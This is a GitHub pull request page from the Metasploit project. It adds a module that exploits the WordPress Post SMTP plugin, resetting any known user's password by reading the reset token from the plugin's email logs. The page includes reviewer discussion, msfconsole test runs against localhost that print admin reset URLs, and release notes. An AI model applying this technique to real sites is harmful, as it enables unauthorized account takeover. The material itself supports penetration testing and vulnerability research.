Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

New Exploit: Wordpress Plugin Post SMTP Account Takeover #19596

Merged
merged 6 commits into from
Nov 29, 2024

Conversation

h00die
Copy link
Contributor

@h00die h00die commented Oct 29, 2024

Fixes #18705

This PR adds a new module targeting the wordpress plugin post smtp plugin. The exploit is to request a password reset on a user, then check the SMTP logs to steal the token for resetting that user's password. Pretty simple, but fun.

Documentation will be done tomorrow.

Verification

@h00die h00die added the module label Oct 29, 2024
lib/msf/core/exploit/remote/http/wordpress/users.rb Outdated Show resolved Hide resolved
modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb Outdated Show resolved Hide resolved
)
register_options(
[
OptString.new('USERNAME', [true, 'Username to password reset', '']),
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

admin by default?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

maybe, but you may want to reset someone else's

modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb Outdated Show resolved Hide resolved
@h00die h00die marked this pull request as ready for review October 30, 2024 19:39
@jheysel-r7 jheysel-r7 self-assigned this Nov 27, 2024
@jheysel-r7 jheysel-r7 added docs rn-modules release notes for new or majorly enhanced modules labels Nov 27, 2024
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hey @h00die, module looks great. Thanks for updating the mixin with reset_user_password method. A couple minor comments, testing was as expected 👍

msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set rport 5555
rport => 5555
msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > run
[*] Running module against 127.0.0.1

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Succesfully created token: SyCnSdOlf8d2LR
[*] Requesting logs
[*] Requesting email content from logs for ID 1
[+] Full text of log saved to: /Users/jheysel/.msf4/loot/20241127125902_default_127.0.0.1_wordpress.post_s_557880.txt
[+] Reset URL: http://localhost:5555/wp-login.php?action=rp&key=g3YAEiUz3n6G6BJqonCl&login=admin&wp_lang=en_US
[*] Auxiliary module execution completed

@h00die
Copy link
Contributor Author

h00die commented Nov 29, 2024

re-tested with changes, still working for me!

Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for making those changes! Also working for me after retesting, landing now.

msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set rport 5555
rport => 5555
msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set username admin
username => admin
msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > run
[*] Running module against 127.0.0.1

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Succesfully created token: FeYJuLfWieI4KAb
[*] Requesting logs
[*] Requesting email content from logs for ID 6
[+] Full text of log saved to: /Users/jheysel/.msf4/loot/20241129085518_default_127.0.0.1_wordpress.post_s_474190.txt
[+] Reset URL: http://localhost:5555/wp-login.php?action=rp&key=D8LVH285Ez5NqNSp1vag&login=admin&wp_lang=en_US
[*] Auxiliary module execution completed

@jheysel-r7 jheysel-r7 merged commit c4b7954 into rapid7:master Nov 29, 2024
69 checks passed
@jheysel-r7
Copy link
Contributor

Release Notes

The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress, plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This adds an exploit module which allows an attacker to reset the password of any known user on the system.

@h00die h00die deleted the wp_post_smtp branch November 29, 2024 23:13
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Archived in project
Development

Successfully merging this pull request may close these issues.

Wordpress POST SMTP Mailer plugin (CVE-2023-6875)
4 participants